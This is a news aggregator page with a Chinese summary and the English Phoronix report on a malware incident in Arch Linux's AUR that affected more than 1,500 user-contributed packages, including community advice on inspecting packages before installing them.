Home 零对冲(ZeroHedge)每日HackerNews

Arch Linux 现认为恶意软件事件已得到控制:涉及超过 1,500 个软件包
Arch Linux Now Believes Malware Incident Under Control: More Than 1,500 Packages

原始链接: https://www.phoronix.com/news/Arch-Linux-AUR-More-Than-1500

Arch Linux 的用户软件仓库 (AUR) 近期发生了一起重大安全漏洞事件,大量由用户贡献的软件包被植入恶意软件。最初报告估计约有 400 个软件包受感染,但随着事态的发展,受影响的软件包数量迅速增加,最终超过了 1,500 个。 Arch Linux 开发人员已介入并删除了所有已确认的恶意提交。然而,官方更新指出,1,579 个这一最终统计数字可能仍不完整,因为它仅涵盖了“许多(而非全部)”受损软件包的列表。此次事件突显了依赖社区维护仓库所固有的风险,也严正提醒用户在从不可信来源安装软件时务必保持谨慎。

据报道,Arch Linux 近期发生的一起恶意软件事件已得到控制。此次安全漏洞仅限于 Arch 用户仓库(AUR),这是一个由社区驱动的平台,其中的软件无需经过正式审核即可发布。 Hacker News 上的讨论强调,AUR 本质上是一个“自由开放”的平台,并始终提醒用户在安装前应检查软件包内容。评论者建议,用户可以通过使用 `rua` 等命令行工具在安装前检查软件包、保持最小化依赖项,以及在进行银行转账等敏感操作时保持谨慎,从而降低此类风险。此次事件再次提醒人们,在安装来自非审核来源的第三方软件时,保持警惕至关重要。
相关文章
原文
The day started out with Arch Linux's AUR user-contributed repository seeing more than 400 packages compromised with malware. Now in ending out the day they believe all affected commits have been addressed. But it ended up being more than 1,500 affected packages.

It was bad enough when finding out more than 400 AUR packages for Arch Linux users had been infected with malware but now that number has risen to around 900 a few hours ago and now in the end at more than 1,500 user-contributed packages.

In an update a few hours ago, it was believed around 900 packages were infected by malware in this week's incident.

Then as of writing now, the last message in the thread over this security incident is noting that Arch Linux developers have deleted all the malicious commits they are aware of. Cited was this list that puts the number of malware-affected packages at 1,579! Tons of software in this user-maintained Arch Linux user repository were impacted by this nasty security incident.

Even at 1,579 packages listed, that final updated noted, it's a "list containing many (but not all) of the affected packages". Ouch.

联系我们 contact @ memedata.com